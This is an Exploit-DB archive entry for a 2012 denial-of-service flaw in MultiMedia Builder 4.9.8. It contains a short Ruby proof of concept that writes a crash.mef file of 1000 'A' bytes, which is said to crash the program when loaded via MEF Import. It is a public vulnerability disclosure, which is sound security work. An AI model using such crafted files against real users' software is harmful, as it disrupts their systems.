MultiMedia Builder 4.9.8 - '.mef' Denial of Service

Author: Ahmed Elhady Mohamed
type: dos
platform: windows
port: 
date_added: 2012-05-15  
date_updated: 2012-05-15  
verified: 1  
codes: OSVDB-82083  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-15-at-20436-pm.png  
application_url:   

raw file: 18879.rb  
Multimedia Builder 4.9.8 Malicious mef File Denial of service
===================================================================================
# Exploit Title:Multimedia Builder 4.9.8 Malicious mef File Denial of service
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# Website: www.infosec4all.tk
# version: 4.9.8
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC####################################################
#Multimedia Builder 4.9.8 Malicious mef File Denial of service vulnerability ,when opening a   #
#malicious .mef file.                                                                          #
#To trigger the exploit , go to file->MEF Import ->load MEF                                    #                                                               #
################################################################################################

#!/usr/bin/ruby

File.open "crash.mef" , "w" do |file|

crash = "\x41" * 1000
file.write crash
end